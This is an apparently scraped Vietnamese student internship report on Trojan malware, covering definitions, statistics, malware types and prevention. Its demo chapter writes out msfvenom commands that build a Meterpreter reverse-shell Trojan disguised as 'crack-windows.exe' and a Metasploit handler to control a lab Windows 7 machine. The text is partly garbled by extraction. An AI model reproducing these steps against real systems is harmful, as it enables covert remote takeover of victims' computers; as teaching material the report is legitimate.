. Khái niệm về Trojan Trước tiên chúng ta cần phải biết Trojan là gì? Trojan là: Một chương trình trái phép được chứa trong 1 chương trình hợp pháp . Các chương trình này sẽ thực hiện các chức năng ẩn với người dùng (không mong muốn) Đó cũng có thể là 1 chương trình hợp pháp nhưng đã được thay đổi bởi sự bố trí của các đoạn mã trí phép. Khi chương trình khởi chạy, các đoạn mã trái phép này sẽ thực hiện các chức năng ẩn với người dùng và nhiều khi là các chức năng không mong muốn Bất cứ 1 chương trình nào xuất hiện nhằm thực hiện 1 chức năng cần thiết của người sử dụng nhưng nó lại thực hiện các chức năng ẩn vời người dùng và thường là không mong muốn vì bản thân code của chương trình sinh ra nhằm thực hiện 1 mục đích nào đó của người viết( thường là mục đích xấu). Như vậy Trojan là một chương trình ẩn, xâm nhập vào hệ thống và phá hoại từ bên trong. Nó tương tự như câu chuyện thần thoại về con ngựa thành troy trong thần thoại Hy Lạp. Và cái tên trojan bắt nguồn từ ý tưởng này. Lần đầu tiên Trojan được biết đến là khi Cult of the Dead Cow tạo ra Back Orifice, một Trojan nổi tiếng tấn công vào cổng 31337.
TRƯỜNG ĐẠI HỌC CÔNG NGHỆ THÔNG TIN & TRUYỀN THÔNG KHOA CÔNG NGHỆ THÔNG TIN BÁO CÁO THỰC TẬP TỐT NGHIỆP Đề tài:TÌM HIỂU VỀ MÃ ĐỘC TROJAN VÀ CÁC BIỆN PHÁP AN TOÀN KHI BỊ MÃ ĐỘC TẤN CÔNG Giáo viên hướng dẫn: Nguyễn Anh Chuyên Sinh viên : Vũ Thị Hoa Lớp : An tồn thơng tin K16 1 LỜI CẢM ƠN Trước hết em xin cảm ơn sâu sắc tới TS.Nguyễn Anh Chuyên, định hướng cho em việc lựa chọn đề tài, đưa nhận xét quý giá trực tiếp hướng dẫn em suốt trình nghiên cứu hoàn báo cáo thực tập tốt nghiệp Em xin cảm ơn cán Công nghệ thông tin truyền thông; thầy cô khoa Công nghệ thông tin, giúp đỡ truyền đạt kiến thức cho em suốt thời gian học tập nghiên cứu trường 2 MỤC LỤC 3 DANH MỤC HÌNH ẢNH 4 CHƯƠNG 1: TỔNG QUAN VỀ MÃ ĐỘC 1.1 1.1.1 Tổng quan mã độc Khái niệm mã độc Theo quan điểm Viện tiêu chuẩn – công nghệ quốc gia Hoa Kỳ (NIST- National Institute of Standart and Technology) định nghĩa phân loại lĩnh vực “Virus máy tính”, mã độc (Malware) định nghĩa chương trình chèn cách bí mật vào hệ thống với mục đích làm tổn hại đến tính bí mật, tính tồn vẹn tính sẵn sàng hệ thống Theo định nghĩa mã độc bao hàm nhiều thể loại mà Việt Nam quen gọi chung Virus máy tính Worm, Trojan, Spy-ware, … chí Virus công cụ để công hệ thống mà hacker thường sử dụng Backdoor, Rootkit, Key-logger 1.1.2 Tình hình mã độc Việt Nam giới Kể từ mã độc xuất vào năm 1984 đến năm 2013, theo viện nghiên cứu độc lập an tồn thơng tin AV-TEST, có khoảng 120.000.000 mã độc phát tán Đặc biệt, vòng năm năm gần đây, số lượng mã độc phát triển nhanh chóng tồn giới đặt nhiều vấn đề an ninh thông tin cho toàn người sử dụng Internet toàn cầu 5 Hình 1:Tình hình mã độc Việt Nam giới Chủng loại mã độc đa dạng phong phú hành vi mục đích phát tán Các lĩnh vực mà mã độc nhắm đến bao gồm kinh tế, trị, tơn giáo nhiều lĩnh vực quan trọng khác Trong năm 2012, giới bị rúng động hoành hành Flame Duqu, Virus đánh cắp thông tin mật hệ thống điện tốn khu vực Trung Đơng Tại Việt Nam, xu hướng công, phát tán phần mềm có mã độc vào quan, doanh nghiệp hình thái giới tội phạm mạng mang tính chất quốc gia xuất Việt Nam Bên cạnh loại mã độc phổ biến xuất dạng mã độc mới, mã độc đính kèm tập tin văn Hầu hết người nhận email mở tập tin văn đính kèm bị nhiễm mã độc khai thác lỗ hổng phần mềm Microsoft Office (bao gồm Word, Excel PowerPoint) Khi xâm nhập vào máy tính, mã độc âm thầm kiểm sốt tồn máy tính nạn nhân, mở cổng hậu (Backdoor), cho phép tin tặc điều khiển máy tính nạn nhân từ xa Chúng nhận lệnh tin tặc tải mã độc khác máy tính để ghi lại thao tác bàn phím, chụp hình, lấy cắp tài liệu Dưới hình mô tả số liệu thống kê từ hãng bảo mật Kaspersky, năm 2012, Việt Nam nằm danh sách 15 nước có tỉ lệ phát tán mã độc nhiều giới 6 Hình 2: Danh sách 15 nước phát tán mã độc nhiều giới Trước gia tăng mạnh mẽ số lượng mục đích cơng mã độc có nhiều biện pháp nhằm ngăn chặn phòng ngừa mã độc sử dụng chương trình diệt Virus, sử dụng hệ thống tường lửa, IDS, IPS để bảo vệ hệ thống, Tuy nhiên biện pháp phần ngăn chặn loại Virus biết đến rộng rãi, biến thể mã độc mã độc sinh ngày nhiều vơ hình trước biện pháp bảo vệ Hình 3: Tình hình mã độc tháng 5/2013 theo BKAV Tại Trung tâm ứng cứu khẩn cấp máy tính Việt Nam (VNCERT), để truy nguồn phát tán mã độc cập nhật nhanh dấu hiệu mã độc cho hệ thống bảo vệ, thơng thường chun viên phải tiến hành phân tích hành vi mã độc phương pháp thủ công Nhưng với số lượng 7 mã độc ngày nhiều việc dùng phương pháp phân tích thủ cơng không theo kịp tiến độ, đề tài nghiên cứu xây dựng hệ thống tự động phân tích hành vi mã độc nhằm hỗ trợ cơng tác chun mơn, nhanh chóng nhận diện phát hành vi loại mã độc xuất để có biện pháp ứng cứu cố theo chức VNCERT, đồng thời giúp rút ngắn thời gian phân tích mã độc lại phân tích nhiều mã độc trước Theo thống kê VNCERT hiệp hội an tồn thơng tin Việt Nam, năm 2012 có tới 2.203 website quan doanh nghiệp Việt Nam bị tin tặc công chiếm quyền điều khiển Sau kiểm sốt thành cơng hệ thống mạng website, tin tặc thường sử dụng mã độc để trì điều khiển để dị tìm cơng qua hệ thống khác có liên quan đến mạng Bên cạnh mã độc cơng cụ để phá hoại liệu đánh cắp thông tin cá nhân người dùng, công cụ diệt Virus phần lớn thường không phát phát chậm loại Virus xuất 1.2 Phân loại mã độc Trong tài liệu NIST có số khác biệt theo định nghĩa cách hiểu thông thường Virus máy tính thơng dụng Ngay tên tài liệu nêu lên khác biệt, tác giả nói tới “Malware” khơng sử dụng thuật ngữ “Virus” Tại Việt Nam nay, thuật ngữ “Virus máy tính” dùng rộng rãi bao hàm tất dạng mã độc hại mạng, máy tính cá nhân Khi nói đến “Virus máy tính”, cách tự nhiên tất người nghĩ Virus bao gồm Worm, Trojan, Keylogger Trong theo định nghĩa NIST (và gần cộng đồng IT) Virus, Worm, Trojan horse, Adware, Spyware, Backdoor, Botnet, Launcher, Rootkit, dạng mã độc hại 8 Sự khác biệt dẫn tới số khó khăn, ví dụ trao đổi với tổ chức quốc tế an toàn thông tin, trao đổi với hỗ trợ kỹ thuật từ Trung tâm phịng chống Virus nước ngồi khơng đồng định nghĩa Phía Việt nam thơng báo “bị Virus công”, đối tác gửi lại dẫn để quét tập tin bị nhiễm PC, thực chất cơng Worm phải phịng chống tồn mạng Do phần tập trung vào việc phân loại giới thiệu số loại mã độc với chức mục đích hoạt động khác Hình 4: Virus đính kèm tập tin thực thi Virus đa hình khác với loại Virus thông thường chỗ Virus thông thường giữ nguyên mã lệnh mình, chúng dễ dàng bị phát phần mềm diệt Virus Nhưng Virus đa hình có khả tự 9 động biến đổi mã lệnh tạo dạng mã độc khác (sử dụng thuật toán dựa thời gian đối tượng lây nhiễm) lần lây nhiễm Khả giúp cho Virus đa hình lẩn tránh khỏi truy quét phần mềm diệt Virus Virus siêu đa hình hệ cao Virus đa hình, chúng cao cấp chỗ hình thức lai tạo kết hợp nhiều kiểu đa hình khác Khi lây nhiễm chúng tự động biến đổi, lai tạp hình thành hệ Virus từ F1…Fn Sau lần lai tạp khả phát chúng khó khăn, Virus siêu đa hình hầu hết qua mắt phần mềm diệt Virus khơng có chế quét sâu dẫn tới việc quét Virus khơng triệt để Một số Virus siêu đa Vetor, Sality… 1.2.1 Sâu máy tính Sâu máy tính (Worm): dạng mã độc có khả tự nhân bản, tự cơng tự tìm cách lan truyền qua hệ thống mạng (thường qua hệ thống thư điện tử lỗ hổng hệ điều hành) Điểm cần lưu ý đây, tác hại thẳng lên máy bị nhiễm, nhiệm vụ Worm phá mạng thông tin, làm giảm khả hoạt động dùng để đánh cắp thông tin nhạy cảm từ mạng Worm tiếng tạo Robert Morris vào năm 1988 Nó làm hỏng hệ điều hành UNIX Internet Trong năm 2001, sâu mật mã đỏ xuất công vào máy Windows để khai thác lỗ hổng máy chủ web IIS, sâu tạo kỷ lục tốc độ lây lan ngày 19-07-2001 có 359.000 máy tính bị nhiễm 10 10 Hình 23: Caro.exe tạo từ hai file dung lượng 353KB Giờ tơi thử chạy file Caro.exe Chỉ có cửa sổ đánh cờ caro bật có file iCmd.exe hoạt động, kiểm tra Task Manager: Hình 24: File iCmd.exe hoạt động Đứng máy tơi remote tới máy qua port 8800 password vne 45 45 Hình 25: Máy remote CHƯƠNG III: CÁCH PHỊNG CHỐNG 3.1.Các phương pháp phịng chống mã độc phổ biến - Không sử dụng phần mềm không tin tưởng (Đôi tin tưởng bị dính Trojans) Hãy chắn tải tập tin đính kèm hay tập tin gửi qua phần mềm chat trực tuyến - Không vào trang web nguy hiểm, không cài ActiveX JavaScript trang web đính kèm Trojans - Tối quan trọng phải update OS thường xuyên - Cài phần mềm diệt virus uy tín: Kaspersky Internet Security, Norton Internet Security, Mcafee Total Security,… nhiều phần mềm diệt Virus chống Trojan hay khác Sau cài phần mềm bạn update thường xun 3.1.1 Giữ cho máy tính bạn cập nhật 46 46 Trojan giao dịch lớn - đặc biệt máy tính Mac - có nghĩa vá giữ cố định loại bỏ trojan horse thường phát hành trojan cấp cao lây nhiễm độc sang nhiều máy tính khác Cập nhật máy tính giúp cập nhật bảo mật tường lửa cho máy tính bạn, điều nâng cao hội cho tùy chọn bảo mật bạn, ngăn chặn việc tải xuống trojan trước đến máy tính bạn 3.1.2 Tránh download tệp từ trang web bên thứ ba Hầu tất phần mềm có nguồn gốc từ trang web tác giả cụ thể "bên thứ nhất" (ví dụ, chương trình Steam sử dụng hầu hết game thủ PC có nguồn gốc tải xuống từ trang web Steam) Download phần mềm từ trang web khác với trang web có nguồn có rủi ro vơ tình dẫn đến việc cài đặt phải phần mềm độc hại Ngoại lệ trang web bên thứ đáng tin cậy liệt kê trang web khác vị trí tải xuống trang web 3.1.3 Khơng sử dụng trang web P2P torrent Vì lý tương tự mà việc download chương trình từ trang web bên thứ ba khơng khuyến khích, sử dụng trang web torrent (hoặc P2P) để tải xuống tệp nguy hiểm cho máy tính bạn Điều đặc biệt tải xuống phiên chương trình crack trojan ln ẩn thành tệp cài đặt cho chương trình khác 3.1.4 Cố gắng khơng tắt tính chống virus tường lửa Có số chương trình gợi ý bạn nên tạo ngoại lệ tường lửa tắt tính chống virus khoảng thời gian ngắn làm 47 47 khiến máy tính bạn có lỗ hổng để cơng có lợi cho việc cài đặt trojan vào máy tính 3.1.5 Xóa chương trình gây rối Safe Mode Safe Mode hạn chế số lượng chương trình chạy với chương trình để chạy máy tính bạn; điều thường vơ hiệu hóa chương trình cài đặt trojan, cho phép loại bỏ chúng mà không gặp lỗi khiến trojan quay trở lại sau Có thể muốn sử dụng Safe Mode để xóa thứ chẳng hạn chương trình cơng cụ khơng mong muốn (ví dụ: Bing) CHƯƠNG IV: DEMO Tạo mã độc Trojan kali gài file vào máy win7 để chiếm quyền điều khiển Bước 1: Mở phần mềm exploit Mở Terminal nhập msfvenom Thao tác hiển thị danh sách lệnh có sẵn metasploit 48 48 Bước 2: Chọn payload Để xem payload có sẵn nhập msfvenom -l payloads Em sử dụng windows/meterpreter/reverse_tcp Cho phép nhập keylog, tìm kiếm liệu kiểm sốt hệ thống tệp, micro webcam máy tính bị nhiễm Bước 3: Tuỳ chỉnh payload Bây có payload kiểm tra tuỳ chọn em nhập 49 49 msfvenom list-options -p windows/meterpreter/reverse_tcp Em thấy LHOST trống, nơi kẻ khai thác gửi thông tin từ thiết bị bị nhiễm Hầu hết trường hợp địa ip Để tìm dịa ip em nhập ifconfig 50 50 Địa ip 172.16.154.129 Địa ip tham số LHOST Bước 5: Tạo Trojan Bây có payload, địa ip số port em nhập Msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.154.129 LPORT=4444 -f exe > crack-windows.exe 51 51 Xem tệp ls thấy tệp bật lên Tạo thành công Trojan 52 52 Bước 6: Sử dụng Meterpreter để điều khiển Trojn Nhập vào use exploit/multi/handler set payload windows/meterpreter/reverse_tcp 53 53 Địa ip set lhost 172.16.154.129 set lport 4444 54 54 Bây em nhập run để bắt đầu chạy Em đợi máy ảo win7 chạy virus trojan lên em xâm điều khiển máy 55 55 Hình ảnh bên máy tính win mở file chứa virus Trojan rồi, em điều khiển tắt máy tính win 56 56 Hình ảnh bị tắt máy 57 57 KẾT LUẬN Qua báo cáo này, hy vọng đem lại kiến thức quan trọng Trojan, tác hại cách phòng chống chúng Trojan phát triển ngày Theo báo cáo quý I PandaLabs, ba tháng đầu năm 2011, trung bình hàng ngày có 73.000 mẫu phần mềm độc hại đời, phần lớn số trojan Người sử dụng Internet phải đối mặt với nguy bị công lớn Để không trở thành nạn nhân Trojan, người cần nhận thức lại an ninh Internet, dùng phần mềm có nguồn gốc, thường xuyên update phần mềm diệt virus hệ điều hành 58 58 TÀI LIỆU THAM KHẢO [1] https://digitalfuture.vn/ma-doc-trojan-la-phuong-thuc-tan-cong-kieu-ginguy-hiem-khong [2] https://cuongquach.com/trojan-la-gi.html [3] https://securitybox.vn/1854/ma-doc-trojan-nhung-dieu-can-biet/ [4] https://cungdaythang.com/virus-trojan-la-gi/ [5] http://congnghehanoi.edu.vn/trojan-la-gi.html [6] https://bkhost.vn/posts/trojan-la-gi [7] https://tltvietnam.vn/cach-phong-tranh-trojan-hieu-qua-nhat.html [8] http://www.thuvientailieu.vn/tai-lieu/de-tai-tim-hieu-ve-an-ninh-mang-vaky-thuat-tan-cong-trojan-and-backdoor-16167/ [9] https://binhphuoc.gov.vn/vi/dvc/hoi-dap/cac-phuong-phap-phong-chongma-doc-pho-bien-45.html [10] https://vinahost.vn/virus-la-gi.html [11] https://securitydaily.net/canh-bao-trojan-danh-cap-du-lieu-vo-hinh-thongqua-usb/ [12] https://www.semtek.com.vn/trojan-la-gi/ [13] https://ghiencongnghe.info/trojan-la-gi.html [14] https://kaspersky.proguide.vn/bao-mat-cong-nghe/canh-bao-ma-doctrojan-ngan-hang-moi-tan-cong-112-ung-dung-tai-chinh/ [15] https://www.thegioididong.com/hoi-dap/trojan-la-gi-cach-phong-tranhvirus-trojan-xam-nhap-may-1229100 [16] https://text.xemtailieu.net/tai-lieu/do-an-tim-hieu-ve-an-ninh-mang-vaky-thuat-tan-cong-trojan-and-backdoor-1007002.html 59 59 ... truy cập vào máy tính 17 17 CHƯƠNG II: MÃ ĐỘC TROJAN 2.1 Khái nệm Trojan dạng Trojan 2.1.1 Khái niệm Trojan Trước tiên cần phải biết Trojan gì? Trojan là: - Một chương trình trái phép chứa chương... gian qua) Một biến thể khác DoS trojan mail-bomb trojan Mục đích trojan lây lan nhiều máy tính tốt đồng thời công địa email cụ thể 2.1.3.6.Proxy / Wingate Trojans Một tính thú vị nhiều loại trojan. .. Trojan 34 34 Ngồi bạn sử dụng phần mềm Scan Trojan để phát Trojan thiết bị 2.7.Cách phát chương trìnhTrojan Có ba nguyên lý chương trình Trojan nào: Một trojan muốn hoạt động phải lắng nghe request